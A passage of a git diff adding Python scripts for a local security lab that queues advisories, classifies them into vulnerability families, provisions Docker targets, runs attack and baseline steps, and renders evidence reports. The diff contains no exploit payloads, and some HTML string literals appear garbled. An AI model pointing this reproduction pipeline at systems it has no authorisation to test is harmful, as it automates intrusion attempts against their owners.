REGISTRY_ROOT / "systems" +RUNS_DIR = REGISTRY_ROOT / "runs" +TRIAGE_DIR = REGISTRY_ROOT / "triage" +GENERATED_DIR = INTEL_ROOT / "generated" +DASHBOARD_DIR = GENERATED_DIR / "dashboard" +QUEUE_DIR = INTEL_ROOT / "queue" +QUEUE_PATH = QUEUE_DIR / "repro-queue.json" +SOURCE_MAP_PATH = INTEL_ROOT / "source-map.yaml" +REPRO_MAP_PATH = INTEL_ROOT / "repro-map.yaml" +REPRO_PROFILES_DIR = INTEL_ROOT / "repro-profiles" +CASE_RUNS_DIR = ROOT / "06-case-studies" / "generated-runs" +ENV_ROOT = ROOT / "00-environments" +ENV_CATALOG_DIR = ENV_ROOT / "catalog" / "systems" +ENV_PROFILES_DIR = ENV_ROOT / "profiles" +ENV_TEMPLATES_DIR = ENV_ROOT / "templates" / "synthetic" diff --git a/scripts/lab/evidence.py b/scripts/lab/evidence.py new file mode 100644 index 00000000..dc575642 --- /dev/null +++ b/scripts/lab/evidence.py @@ -0,0 +1,32 @@ +from __future__ import annotations + +from pathlib import Path +from typing import Any, Dict, List + +from lab.utils import command_available, run, write_json + + +def collect_container_logs(run_dir: Path, compose_path: Path) -> List[str]: + if not command_available("docker"): + return [] + log_dir = run_dir / "logs" / "docker" + log_dir.mkdir(parents=True, exist_ok=True) + ps = run(["docker", "compose", "-f", str(compose_path), "ps", "--services"], cwd=run_dir) + refs: List[str] = [] + if ps.returncode != 0: + return refs + for service in ps.stdout.splitlines(): + service = service.strip() + if not service: + continue + result = run(["docker", "compose", "-f", str(compose_path), "logs", "--no-color", service], cwd=run_dir) + path = log_dir / f"{service}.log" + path.write_text(result.stdout or result.stderr or "", encoding="utf-8") + refs.append(str(path)) + return refs + + +def write_run_bundle(run_dir: Path, bundle: Dict[str, Any]) -> Path: + path = run_dir / "run.json" + write_json(path, bundle) + return path diff --git a/scripts/lab/main.py b/scripts/lab/main.py new file mode 100644 index 00000000..54f4f144 --- /dev/null +++ b/scripts/lab/main.py @@ -0,0 +1,380 @@ +#!/usr/bin/env python3 +from __future__ import annotations + +import argparse +import sys +from pathlib import Path +from typing import Any, Dict, List + +CURRENT_DIR = Path(__file__).resolve().parent +SCRIPTS_DIR = CURRENT_DIR.parent +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from lab import attack, baseline, browser, catalog, evidence, provision, render, repro, seed, task_queue, validators # noqa: E402 +from lab.config import ADVISORIES_DIR, CASE_RUNS_DIR, ENV_PROFILES_DIR, RUNS_DIR # noqa: E402 +from lab.utils import command_available, ensure_dir, isoformat, load_json_dir, now_utc, read_json, read_yaml, write_json # noqa: E402 + + +def _load_advisory(canonical_id: str) -> Dict[str, Any]: + advisory = read_json(ADVISORIES_DIR / f"{canonical_id}.json", default=None) + if not advisory: + raise ValueError(f"Unknown advisory: {canonical_id}") + return advisory + + +def _run_dir(run_id: str) -> Path: + path = CASE_RUNS_DIR / run_id + ensure_dir(path) + ensure_dir(path / "logs") + ensure_dir(path / "assets") + return path + + +def _compose_run_id(advisory: Dict[str, Any]) -> str: + return f"{advisory['system_id']}-{advisory['canonical_id']}-{now_utc().strftime('%Y%m%d%H%M%S')}" + + +def _resolve_profile(advisory: Dict[str, Any]) -> Dict[str, Any]: + profile = repro.resolve_profile(advisory["canonical_id"], advisory) + current_profile = read_yaml(ENV_PROFILES_DIR / "core" / advisory["system_id"] / "current.yaml", default={}) or {} + merged = dict(current_profile) + merged.update(profile) + if current_profile.get("services") and not merged.get("services"): + merged["services"] = current_profile["services"] + if current_profile.get("baseline_urls") and not merged.get("baseline_urls"): + merged["baseline_urls"] = current_profile["baseline_urls"] + if current_profile.get("artifact_mode") and not merged.get("artifact_mode"): + merged["artifact_mode"] = current_profile["artifact_mode"] + if current_profile.get("verification_mode") and not merged.get("verification_mode"): + merged["verification_mode"] = current_profile["verification_mode"] + if current_profile.get("browser_required"): + merged.setdefault("browser_assertions", {}) + merged["browser_assertions"].setdefault("required", current_profile["browser_required"]) + if not profile.get("system_id"): + merged["system_id"] = advisory["system_id"] + if not profile.get("profile_id"): + merged["profile_id"] = advisory["canonical_id"] + return merged + + +def _build_run_bundle( + advisory: Dict[str, Any], + profile: Dict[str, Any], + run_id: str, + verification_status: str, + verification_mode: str, + artifact_mode: str, + baseline_refs: List[str], + attack_steps: List[Dict[str, Any]], + browser_refs: List[str], + container_log_refs: List[str], + request_log_refs: List[str], + blocked_reason: str | None, +) -> Dict[str, Any]: + return { + "run_id": run_id, + "system_id": advisory["system_id"], + "advisory_id": advisory["canonical_id"], + "repro_profile_id": profile["profile_id"], + "verification_status": verification_status, + "verification_mode": verification_mode, + "artifact_mode": artifact_mode, + "target_env": "local-docker", + "compose_services": sorted(profile.get("services", {}).keys()), + "baseline_refs": baseline_refs, + "attack_steps": attack_steps, + "browser_refs": browser_refs, + "container_log_refs": container_log_refs, + "request_log_refs": request_log_refs, + "timeline": [], + "started_at": isoformat(now_utc()), + "finished_at": isoformat(now_utc()), + "blocked_reason": blocked_reason, + } + + +def cmd_catalog_sync(args) -> int: + summary = catalog.sync_catalog(write_profiles=True, write_repro_map=True) + print(summary) + return 0 + + +def cmd_compose_generate(args) -> int: + advisory = _load_advisory(args.case) + profile = _resolve_profile(advisory) + run_dir = _run_dir(args.run_id or f"compose-{advisory['canonical_id']}") + compose_result = provision.prepare(profile, run_dir, dry_run=True) + print(compose_result) + return 0 + + +def cmd_provision(args) -> int: + advisory = _load_advisory(args.case) + profile = _resolve_profile(advisory) + run_dir = _run_dir(args.run_id or _compose_run_id(advisory)) + result = provision.prepare(profile, run_dir, dry_run=args.dry_run) + print(result) + return 0 + + +def cmd_seed(args) -> int: + advisory = _load_advisory(args.case) + profile = _resolve_profile(advisory) + print({"steps": seed.run_seed(profile)}) + return 0 + + +def cmd_baseline(args) -> int: + advisory = _load_advisory(args.case) + profile = _resolve_profile(advisory) + run_dir = _run_dir(args.run_id or _compose_run_id(advisory)) + result = baseline.collect(profile, run_dir) + print(result) + return 0 + + +def cmd_attack(args) -> int: + advisory = _load_advisory(args.case) + profile = _resolve_profile(advisory) + run_dir = _run_dir(args.run_id or _compose_run_id(advisory)) + result = attack.run_attack(profile, advisory, run_dir, dry_run=args.dry_run) + print(result) + return 0 + + +def cmd_verify(args) -> int: + advisory = _load_advisory(args.case) + profile = _resolve_profile(advisory) + browser_required = bool(profile.get("browser_assertions", {}).get("required")) + payload = { + "advisory": advisory["canonical_id"], + "profile_id": profile["profile_id"], + "browser_required": browser_required, + "result": "ready-for-run", + } + print(payload) + return 0 + + +def cmd_run_case(args) -> int: + advisory = _load_advisory(args.case) + profile = _resolve_profile(advisory) + run_id = args.run_id or _compose_run_id(advisory) + run_dir = _run_dir(run_id) + + provision_result = provision.prepare(profile, run_dir, dry_run=args.dry_run) + baseline_payload = baseline.collect(profile, run_dir) if profile.get("baseline_urls") else {"observations": []} + attack_payload = attack.run_attack(profile, advisory, run_dir, dry_run=args.dry_run) + + browser_payload = {"required": bool(profile.get("browser_assertions", {}).get("required")), "present": False, "refs": []} + blocked_reason = provision_result.get("blocked_reason") + if browser_payload["required"] and not args.dry_run and profile.get("baseline_urls"): + browser_payload = browser.capture(profile["baseline_urls"][0], run_dir, prefix="proof") + if not browser_payload.get("present"): + blocked_reason = blocked_reason or browser_payload.get("reason") + + compose_path = Path(provision_result["compose_path"]) + container_logs = evidence.collect_container_logs(run_dir, compose_path) if compose_path.exists() else [] + + verification_status = "triage-manual" + verification_mode = profile.get("verification_mode", "synthetic") + artifact_mode = profile.get("artifact_mode", profile.get("provisioning_mode", "synthetic")) + if args.dry_run: + verification_status = "triage-manual" + blocked_reason = blocked_reason or "dry-run only" + elif provision_result.get("status") == "blocked-artifact": + verification_status = "blocked-artifact" + elif browser_payload.get("required") and not browser_payload.get("present"): + verification_status = "triage-manual" + elif artifact_mode == "synthetic": + verification_status = "verified-synthetic" + else: + verification_status = "verified-real" + + bundle = _build_run_bundle( + advisory=advisory, + profile=profile, + run_id=run_id, + verification_status=verification_status, + verification_mode=verification_mode, + artifact_mode=artifact_mode, + baseline_refs=[str(run_dir / "logs" / "baseline.json")] if baseline_payload.get("observations") else [], + attack_steps=attack_payload.get("steps", []), + browser_refs=browser_payload.get("refs", []), + container_log_refs=container_logs, + request_log_refs=[str(run_dir / "logs" / "attack.json"), str(run_dir / "logs" / "baseline.json")], + blocked_reason=blocked_reason, + ) + report_refs = render.render_run(bundle) + bundle["report_refs"] = report_refs + evidence.write_run_bundle(run_dir, bundle) + ensure_dir(RUNS_DIR) + write_json(RUNS_DIR / f"{run_id}.json", bundle) + render.render_dashboard() + print(bundle) + return 0 + + +def cmd_run_system(args) -> int: + advisories = [item for item in load_json_dir(ADVISORIES_DIR) if item.get("system_id") == args.system] + selected = advisories[: args.limit] + for advisory in selected: + cmd_run_case(argparse.Namespace(case=advisory["canonical_id"], run_id=None, dry_run=args.dry_run)) + print({"system": args.system, "count": len(selected)}) + return 0 + + +def cmd_run_batch(args) -> int: + if args.from_queue: + items = task_queue.dequeue(limit=args.limit) + else: + task_queue.enqueue_from_registry(only_hotlane=args.only_hotlane, limit=args.limit) + items = task_queue.dequeue(limit=args.limit) + for item in items: + cmd_run_case(argparse.Namespace(case=item["advisory_id"], run_id=None, dry_run=args.dry_run)) + print({"processed": len(items)}) + return 0 + + +def cmd_render_run(args) -> int: + run = read_json(RUNS_DIR / f"{args.run_id}.json", default=None) + if not run: + raise ValueError(f"Unknown run: {args.run_id}") + print(render.render_run(run)) + return 0 + + +def cmd_serve_dashboard(args) -> int: + render.render_dashboard() + import http.server + import socketserver + + os_dir = str(render.DASHBOARD_DIR if hasattr(render, "DASHBOARD_DIR") else "") + if not os_dir: + from lab.config import DASHBOARD_DIR + + os_dir = str(DASHBOARD_DIR) + handler = http.server.SimpleHTTPRequestHandler + with socketserver.TCPServer(("127.0.0.1", args.port), handler) as httpd: + print(f"serving dashboard at http://127.0.0.1:{args.port}/") + import os + + os.chdir(os_dir) + httpd.serve_forever() + + +def cmd_cleanup(args) -> int: + run = read_json(RUNS_DIR / f"{args.run_id}.json", default=None) + if not run: + raise ValueError(f"Unknown run: {args.run_id}") + compose_path = Path(run["report_refs"]["bundle_dir"]) / "compose" / "compose.yaml" + if command_available("docker") and compose_path.exists(): + from lab.utils import run as shell_run + + shell_run(["docker", "compose", "-f", str(compose_path), "down", "-v"], cwd=compose_path.parent.parent) + print({"cleaned": args.run_id}) + return 0 + + +def cmd_retry_failures(args) -> int: + failed = [ + item + for item in load_json_dir(RUNS_DIR) + if item.get("verification_status") in {"blocked-artifact", "triage-manual"} + ] + task_queue.enqueue_items( + [{"advisory_id": item["advisory_id"], "system_id": item["system_id"], "priority": "retry"} for item in failed[: args.limit]] + ) + print({"requeued": min(len(failed), args.limit)}) + return 0 + + +def cmd_validate(args) -> int: + errors = validators.validate_assets() + if errors: + print("Validation failed:") + for error in errors: + print(f"- {error}") + return 1 + print("Validation passed.") + return 0 + + +def build_parser() -> argparse.ArgumentParser: + parser = argparse.ArgumentParser(description="Websafe local lab orchestrator") + subparsers = parser.add_subparsers(dest="command", required=True) + + catalog_sync = subparsers.add_parser("catalog", help="catalog operations") + catalog_sub = catalog_sync.add_subparsers(dest="catalog_command", required=True) + catalog_sync_cmd = catalog_sub.add_parser("sync", help="sync environment catalog and repro map") + catalog_sync_cmd.set_defaults(func=cmd_catalog_sync) + + compose_generate = subparsers.add_parser("compose", help="compose operations") + compose_sub = compose_generate.add_subparsers(dest="compose_command", required=True) + compose_generate_cmd = compose_sub.add_parser("generate", help="generate compose file for a case") + compose_generate_cmd.add_argument("--case", required=True) + compose_generate_cmd.add_argument("--run-id") + compose_generate_cmd.set_defaults(func=cmd_compose_generate) + + for name, func in [ + ("provision", cmd_provision), + ("seed", cmd_seed), + ("baseline", cmd_baseline), + ("attack", cmd_attack), + ("verify", cmd_verify), + ]: + sub = subparsers.add_parser(name) + sub.add_argument("--case", required=True) + sub.add_argument("--run-id") + sub.add_argument("--dry-run", action="store_true") + sub.set_defaults(func=func) + + run_case = subparsers.add_parser("run-case", help="run a single advisory through the lab pipeline") + run_case.add_argument("--case", required=True) + run_case.add_argument("--run-id") + run_case.add_argument("--dry-run", action="store_true") + run_case.set_defaults(func=cmd_run_case) + + run_system = subparsers.add_parser("run-system", help="run the first N advisories for a system") + run_system.add_argument("--system", required=True) + run_system.add_argument("--limit", type=int, default=5) + run_system.add_argument("--dry-run", action="store_true") + run_system.set_defaults(func=cmd_run_system) + + run_batch = subparsers.add_parser("run-batch", help="process repro queue or enqueue from registry") + run_batch.add_argument("--limit", type=int, default=10) + run_batch.add_argument("--only-hotlane", action="store_true") + run_batch.add_argument("--from-queue", action="store_true") + run_batch.add_argument("--dry-run", action="store_true") + run_batch.set_defaults(func=cmd_run_batch) + + render_run = subparsers.add_parser("render-run", help="re-render a stored run") + render_run.add_argument("--run-id", required=True) + render_run.set_defaults(func=cmd_render_run) + + serve = subparsers.add_parser("serve-dashboard", help="serve the static dashboard locally") + serve.add_argument("--port", type=int, default=8734) + serve.set_defaults(func=cmd_serve_dashboard) + + cleanup = subparsers.add_parser("cleanup", help="tear down a stored run compose environment") + cleanup.add_argument("--run-id", required=True) + cleanup.set_defaults(func=cmd_cleanup) + + retry = subparsers.add_parser("retry-failures", help="requeue blocked or manual runs") + retry.add_argument("--limit", type=int, default=50) + retry.set_defaults(func=cmd_retry_failures) + + validate = subparsers.add_parser("validate", help="validate lab assets") + validate.set_defaults(func=cmd_validate) + return parser + + +def main() -> int: + parser = build_parser() + args = parser.parse_args() + return args.func(args) + + +if __name__ == "__main__": + raise SystemExit(main()) diff --git a/scripts/lab/provision.py b/scripts/lab/provision.py new file mode 100644 index 00000000..c4a27c1e --- /dev/null +++ b/scripts/lab/provision.py @@ -0,0 +1,40 @@ +from __future__ import annotations + +from pathlib import Path +from typing import Any, Dict + +from lab.compose import generate_compose +from lab.utils import command_available, run + + +def prepare(profile: Dict[str, Any], run_dir: Path, dry_run: bool = False) -> Dict[str, Any]: + compose_path, payload = generate_compose(profile, run_dir) + result = { + "compose_path": str(compose_path), + "service_count": len(payload.get("services", {})), + "docker_available": command_available("docker"), + "status": "ready", + } + if dry_run: + result["status"] = "planned" + return result + + if not result["docker_available"]: + result["status"] = "blocked-artifact" + result["blocked_reason"] = "docker unavailable on this machine" + return result + + config = run(["docker", "compose", "-f", str(compose_path), "config"], cwd=run_dir) + result["compose_config_rc"] = config.returncode + if config.returncode != 0: + result["status"] = "blocked-artifact" + result["blocked_reason"] = config.stderr.strip() or "docker compose config failed" + return result + + up = run(["docker", "compose", "-f", str(compose_path), "up", "-d"], cwd=run_dir) + result["compose_up_rc"] = up.returncode + if up.returncode != 0: + result["status"] = "blocked-artifact" + result["blocked_reason"] = up.stderr.strip() or "docker compose up failed" + return result + return result diff --git a/scripts/lab/render.py b/scripts/lab/render.py new file mode 100644 index 00000000..d0549842 --- /dev/null +++ b/scripts/lab/render.py @@ -0,0 +1,166 @@ +from __future__ import annotations + +import html +from pathlib import Path +from typing import Any, Dict, List + +from lab.config import CASE_RUNS_DIR, DASHBOARD_DIR, RUNS_DIR +from lab.utils import ensure_dir, load_json_dir, read_json, write_json, write_text + + +def mermaid_from_steps(run: Dict[str, Any]) -> str: + lines = [ + "flowchart LR", + 'A["Select Advisory"] --> B["Resolve Repro Profile"]', + 'B --> C["Provision Compose Environment"]', + 'C --> D["Baseline Snapshot"]', + 'D --> E["Controlled Attack Steps"]', + 'E --> F["Browser Replay"]', + 'F --> G["Collect Logs and Evidence"]', + 'G --> H["Update Registry and Reports"]', + ] + if run.get("blocked_reason"): + lines.append(f'H --> I["Blocked: {run["blocked_reason"][:60]}"]') + return "\n".join(lines) + + +def render_run(run: Dict[str, Any]) -> Dict[str, str]: + run_dir = CASE_RUNS_DIR / run["run_id"] + ensure_dir(run_dir / "assets") + timeline_path = run_dir / "timeline.mmd" + write_text(timeline_path, mermaid_from_steps(run)) + + md_lines = [ + f"# Run {run['run_id']}", + "", + "> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle", + "", + f"- Advisory: `{run['advisory_id']}`", + f"- 系统: `{run['system_id']}`", + f"- Repro Profile: `{run['repro_profile_id']}`", + f"- 实证状态: `{run['verification_status']}`", + f"- 实证方式: `{run['verification_mode']}`", + f"- Artifact 模式: `{run['artifact_mode']}`", + f"- 启动时间: `{run['started_at']}`", + f"- 完成时间: `{run['finished_at']}`", + f"- 阻塞原因: `{run.get('blocked_reason') or '-'}`", + "", + "## 运行时间线", + "", + f"- Mermaid: [{timeline_path.name}]({timeline_path})", + "", + "## 证据摘要", + "", + f"- Baseline: `{len(run.get('baseline_refs', []))}`", + f"- 攻击步骤: `{len(run.get('attack_steps', []))}`", + f"- 浏览器证据: `{len(run.get('browser_refs', []))}`", + f"- 容器日志: `{len(run.get('container_log_refs', []))}`", + f"- 请求日志: `{len(run.get('request_log_refs', []))}`", + "", + "## 最小化验证说明", + "", + "- 仅限自有资产、本地靶场或已授权实验目标。", + "- 默认执行 minimal-proof;不会把破坏性或不可回滚动作作为默认路径。", + "", + ] + if run.get("browser_refs"): + md_lines.extend(["## 浏览器证据", ""]) + for ref in run["browser_refs"]: + md_lines.append(f"- {ref}") + md_lines.append("") + if run.get("container_log_refs"): + md_lines.extend(["## 容器日志", ""]) + for ref in run["container_log_refs"]: + md_lines.append(f"- {ref}") + md_lines.append("") + report_md = run_dir / "report.md" + write_text(report_md, "\n".join(md_lines)) + + html_body = [ + "", + "websafe run report", + "", + "", + f"

Run {html.escape(run['run_id'])}

", + "
", + f"
Advisory
{html.escape(run['advisory_id'])}
", + f"
Status
{html.escape(run['verification_status'])}
", + f"
Profile
{html.escape(run['repro_profile_id'])}
", + f"
Artifact Mode
{html.escape(run['artifact_mode'])}
", + "
", + "

Mermaid Timeline

", + f"
{html.escape(mermaid_from_steps(run))}
", + "

Evidence

    ", + ] + for ref in run.get("browser_refs", []) + run.get("container_log_refs", []) + run.get("request_log_refs", []): + html_body.append(f"
  • {html.escape(ref)}
    • ") + html_body.extend(["
", ""]) + report_html = run_dir / "report.html" + write_text(report_html, "\n".join(html_body)) + return {"bundle_dir": str(run_dir), "report_md": str(report_md), "report_html": str(report_html), "timeline": str(timeline_path)} + + +def render_dashboard() -> Dict[str, str]: + ensure_dir(DASHBOARD_DIR) + runs = load_json_dir(RUNS_DIR) + summary = { + "run_count": len(runs), + "statuses": {}, + "recent_runs": sorted(runs, key=lambda item: item.get("finished_at") or "", reverse=True)[:50], + } + for item in runs: + status = item.get("verification_status", "triage-manual") + summary["statuses"][status] = summary["statuses"].get(status, 0) + 1 + write_json(DASHBOARD_DIR / "summary.json", summary) + write_json(DASHBOARD_DIR / "runs.json", summary["recent_runs"]) + + html_page = """ + + + + websafe dashboard + + + +

websafe Local Lab Dashboard

+

LAB ONLY | AUTHORIZED TARGETS ONLY | 本地静态看板

+
+

Recent Runs

+ + + +
RunAdvisoryStatusModeFinishedReport
+ + + +""" + write_text(DASHBOARD_DIR / "index.html", html_page) + return { + "dashboard_dir": str(DASHBOARD_DIR), + "index_html": str(DASHBOARD_DIR / "index.html"), + } diff --git a/scripts/lab/repro.py b/scripts/lab/repro.py new file mode 100644 index 00000000..757714c8 --- /dev/null +++ b/scripts/lab/repro.py @@ -0,0 +1,157 @@ +from __future__ import annotations + +from pathlib import Path +from typing import Any, Dict, List, Optional, Tuple + +from intel.utils import load_all_json +from lab.config import ADVISORIES_DIR, ENV_CATALOG_DIR, REPRO_MAP_PATH, REPRO_PROFILES_DIR, RUNS_DIR +from lab.utils import read_json, read_yaml, unique + + +FAMILY_KEYWORDS = { + "xss-generic": ["xss", "cross-site scripting", "dom xss", "trusted types", "content injection"], + "sqli-generic": ["sql injection", "sqli"], + "authz-bypass-generic": ["authorization bypass", "auth bypass", "access control", "permission"], + "ssrf-generic": ["ssrf", "server-side request forgery"], + "file-upload-generic": ["file upload", "attachment", "extension bypass"], + "request-smuggling-generic": ["request smuggling", "http desync"], + "template-injection-generic": ["template injection", "ssti"], + "deserialization-generic": ["deserialization", "serialization"], + "proxy-boundary-generic": ["proxy", "middleware", "header trust"], + "plugin-extension-generic": ["plugin", "module", "extension", "theme"], + "session-token-generic": ["token", "cookie", "session", "jwt", "localstorage"], + "path-traversal-generic": ["path traversal", "directory traversal"], + "misconfiguration-generic": ["misconfiguration", "default credentials", "admin panel", "debug"], +} + + +def load_repro_map() -> Dict[str, Any]: + return read_yaml(REPRO_MAP_PATH, default={"systems": []}) or {"systems": []} + + +def load_profiles() -> Dict[str, Dict[str, Any]]: + profiles: Dict[str, Dict[str, Any]] = {} + if not REPRO_PROFILES_DIR.exists(): + return profiles + for file_path in sorted(REPRO_PROFILES_DIR.rglob("*.yaml")): + content = read_yaml(file_path, default=None) + if not isinstance(content, dict): + continue + profile_id = content.get("profile_id") + if profile_id: + profiles[profile_id] = content + return profiles + + +def latest_runs_by_advisory() -> Dict[str, Dict[str, Any]]: + runs: Dict[str, Dict[str, Any]] = {} + for item in load_all_json(RUNS_DIR): + advisory_id = item.get("advisory_id") + if not advisory_id: + continue + previous = runs.get(advisory_id) + if previous is None or (item.get("finished_at") or "") >= (previous.get("finished_at") or ""): + runs[advisory_id] = item + return runs + + +def resolve_repro_family(advisory: Dict[str, Any], system_map: Dict[str, Any]) -> str: + text = " ".join( + filter( + None, + [ + advisory.get("title"), + advisory.get("summary"), + advisory.get("system_id"), + " ".join(advisory.get("aliases", [])), + " ".join(advisory.get("secure_code_topics", [])), + ], + ) + ).lower() + for family, keywords in FAMILY_KEYWORDS.items(): + if any(keyword in text for keyword in keywords): + return family + return system_map.get("default_repro_family", "authz-bypass-generic") + + +def resolve_profile(advisory_id: str, advisory: Optional[Dict[str, Any]] = None) -> Dict[str, Any]: + profiles = load_profiles() + if advisory_id in profiles: + return profiles[advisory_id] + + advisory = advisory or read_json(ADVISORIES_DIR / f"{advisory_id}.json", default={}) or {} + repro_map = {item["system_id"]: item for item in load_repro_map().get("systems", [])} + system_map = repro_map.get(advisory.get("system_id", ""), {}) + + direct_profile = profiles.get(f"{advisory.get('system_id', '')}-{advisory_id}") + if direct_profile: + return direct_profile + + family = resolve_repro_family(advisory, system_map) + profile = profiles.get(family) + if profile: + resolved = dict(profile) + resolved.setdefault("resolved_via", "family-generic") + resolved.setdefault("profile_id", family) + return resolved + return { + "profile_id": family, + "resolved_via": "implicit-fallback", + "vuln_family": family.replace("-generic", ""), + "provisioning_mode": "synthetic", + "browser_assertions": {"required": bool(system_map.get("browser_required_default"))}, + "attack_actions": [], + "baseline_actions": [], + "success_criteria": ["manual triage required"], + "cleanup_policy": "destroy", + "destructive_risk": "medium", + "allowed_target_types": ["lab-local", "lab-public", "authorized-third-party"], + } + + +def advisory_defaults(advisory: Dict[str, Any]) -> Dict[str, Any]: + profile = resolve_profile(advisory["canonical_id"], advisory) + repro_map = {item["system_id"]: item for item in load_repro_map().get("systems", [])} + system_map = repro_map.get(advisory.get("system_id", ""), {}) + mode = "synthetic" if profile.get("provisioning_mode") == "synthetic" else "real" + return { + "verification_status": advisory.get("verification_status") or "triage-manual", + "verification_mode": advisory.get("verification_mode") or mode, + "last_verified_at": advisory.get("last_verified_at"), + "last_run_id": advisory.get("last_run_id"), + "evidence_bundle": advisory.get("evidence_bundle"), + "browser_evidence": advisory.get("browser_evidence") + or { + "required": bool(profile.get("browser_assertions", {}).get("required", system_map.get("browser_required_default", False))), + "present": False, + "refs": [], + }, + "repro_profile_id": advisory.get("repro_profile_id") or profile.get("profile_id"), + "artifact_mode": advisory.get("artifact_mode") or system_map.get("provisioning_mode_preference", ["synthetic"])[0], + "blocked_reason": advisory.get("blocked_reason"), + } + + +def annotate_with_latest_run(advisory: Dict[str, Any], run: Optional[Dict[str, Any]]) -> Dict[str, Any]: + merged = dict(advisory) + merged.update(advisory_defaults(advisory)) + if not run: + return merged + merged.update( + { + "verification_status": run.get("verification_status", merged["verification_status"]), + "verification_mode": run.get("verification_mode", merged["verification_mode"]), + "last_verified_at": run.get("finished_at", merged["last_verified_at"]), + "last_run_id": run.get("run_id"), + "evidence_bundle": run.get("report_refs", {}).get("bundle_dir"), + "browser_evidence": { + "required": merged.get("browser_evidence", {}).get("required", False), + "present": bool(run.get("browser_refs")), + "refs": run.get("browser_refs", []), + }, + "repro_profile_id": run.get("repro_profile_id", merged["repro_profile_id"]), + "artifact_mode": run.get("artifact_mode", merged["artifact_mode"]), + "blocked_reason": run.get("blocked_reason"), + } + ) + return merged diff --git a/scripts/lab/run-queue.sh b/scripts/lab/run-queue.sh new file mode 100644 index 00000000..88312705 --- /dev/null +++ b/scripts/lab/run-queue.sh @@ -0,0 +1,11 @@ +#!/bin/bash +set -euo pipefail + +cd /Users/x/websafe +LOG_DIR="/Users/x/websafe/08-threat-intel/generated/logs" +mkdir -p "$LOG_DIR" +STAMP="$(date '+%Y%m%d-%H%M%S')" +exec >> "$LOG_DIR/lab-queue-$STAMP.log" 2>&1 + +echo "[lab-queue] $(date -u '+%Y-%m-%dT%H:%M:%SZ') starting" +python3 /Users/x/websafe/scripts/lab/main.py run-batch --from-queue --limit 10 diff --git a/scripts/lab/seed.py b/scripts/lab/seed.py new file mode 100644 index 00000000..80750010 --- /dev/null +++ b/scripts/lab/seed.py @@ -0,0 +1,14 @@ +from __future__ import annotations + +from typing import Any, Dict, List + + +def run_seed(profile: Dict[str, Any]) -> List[Dict[str, Any]]: + steps = [] + for action in profile.get("seed_actions", []): + kind = action.get("kind", "note") + if kind == "note": + steps.append({"kind": kind, "status": "recorded", "message": action.get("message", "")}) + else: + steps.append({"kind": kind, "status": "skipped", "message": "Seed action type not yet automated"}) + return steps diff --git a/scripts/lab/task_queue.py b/scripts/lab/task_queue.py new file mode 100644 index 00000000..ab93d1ed --- /dev/null +++ b/scripts/lab/task_queue.py @@ -0,0 +1,49 @@ +from __future__ import annotations + +from typing import Any, Dict, List + +from lab.config import ADVISORIES_DIR, QUEUE_PATH +from lab.utils import load_json_dir, read_json, write_json + + +def load_queue() -> Dict[str, Any]: + return read_json(QUEUE_PATH, default={"items": []}) or {"items": []} + + +def save_queue(queue: Dict[str, Any]) -> None: + write_json(QUEUE_PATH, queue) + + +def enqueue_items(items: List[Dict[str, Any]]) -> Dict[str, Any]: + queue = load_queue() + existing = {item["advisory_id"] for item in queue.get("items", [])} + added = 0 + for item in items: + if item["advisory_id"] in existing: + continue + queue.setdefault("items", []).append(item) + existing.add(item["advisory_id"]) + added += 1 + save_queue(queue) + return {"queued": len(queue["items"]), "added": added} + + +def enqueue_from_registry(only_hotlane: bool = False, limit: int = 50) -> Dict[str, Any]: + advisories = load_json_dir(ADVISORIES_DIR) + items = [] + for advisory in advisories: + if only_hotlane: + hot = advisory.get("exploit_status") in {"known_exploited", "active_exploitation", "in_the_wild"} + if not hot and not (advisory.get("cvss_score") or 0) >= 8.8 and advisory.get("severity") != "critical": + continue + items.append({"advisory_id": advisory["canonical_id"], "system_id": advisory["system_id"], "priority": "hotlane" if only_hotlane else "default"}) + return enqueue_items(items[:limit]) + + +def dequeue(limit: int = 10) -> List[Dict[str, Any]]: + queue = load_queue() + items = queue.get("items", []) + selected = items[:limit] + queue["items"] = items[limit:] + save_queue(queue) + return selected diff --git a/scripts/lab/utils.py b/scripts/lab/utils.py new file mode 100644 index 00000000..fb532b6c --- /dev/null +++ b/scripts/lab/utils.py @@ -0,0 +1,103 @@ +from __future__ import annotations + +import json +import shutil +import subprocess +from datetime import datetime, timezone +from pathlib import Path +from typing import Any, Dict, Iterable, List, Optional + +import yaml + + +UTC = timezone.utc + + +def now_utc() -> datetime: + return datetime.now(tz=UTC) + + +def isoformat(dt: datetime) -> str: + return dt.astimezone(UTC).replace(microsecond=0).isoformat() + + +def ensure_dir(path: Path) -> None: + path.mkdir(parents=True, exist_ok=True) + + +def read_json(path: Path, default: Any = None) -> Any: + if not path.exists(): + return default + return json.loads(path.read_text(encoding="utf-8")) + + +def write_json(path: Path, data: Any) -> None: + ensure_dir(path.parent) + path.write_text(json.dumps(data, indent=2, ensure_ascii=True, sort_keys=False) + "\n", encoding="utf-8") + + +def read_yaml(path: Path, default: Any = None) -> Any: + if not path.exists(): + return default + with path.open("r", encoding="utf-8") as handle: + return yaml.safe_load(handle) + + +def write_yaml(path: Path, data: Any) -> None: + ensure_dir(path.parent) + with path.open("w", encoding="utf-8") as handle: + yaml.safe_dump(data, handle, allow_unicode=False, sort_keys=False) + + +def write_text(path: Path, content: str) -> None: + ensure_dir(path.parent) + path.write_text(content.rstrip() + "\n", encoding="utf-8") + + +def load_json_dir(path: Path) -> List[Dict[str, Any]]: + if not path.exists(): + return [] + values: List[Dict[str, Any]] = [] + for file_path in sorted(path.glob("*.json")): + content = read_json(file_path, default=None) + if isinstance(content, dict): + values.append(content) + return values + + +def run(cmd: List[str], cwd: Optional[Path] = None, check: bool = False) -> subprocess.CompletedProcess: + return subprocess.run( + cmd, + cwd=str(cwd) if cwd else None, + text=True, + capture_output=True, + check=check, + ) + + +def command_available(name: str) -> bool: + return shutil.which(name) is not None + + +def slugify(value: str) -> str: + safe = [] + for ch in value.lower().strip(): + if ch.isalnum(): + safe.append(ch) + else: + safe.append("-") + result = "".join(safe) + while "--" in result: + result = result.replace("--", "-") + return result.strip("-") or "item" + + +def unique(values: Iterable[str]) -> List[str]: + seen = set() + result = [] + for value in values: + if not value or value in seen: + continue + seen.add(value) + result.append(value) + return result diff --git a/scripts/lab/validators.py b/scripts/lab/validators.py new file mode 100644 index 00000000..61aeabeb --- /dev/null +++ b/scripts/lab/validators.py @@ -0,0 +1,35 @@ +from __future__ import annotations + 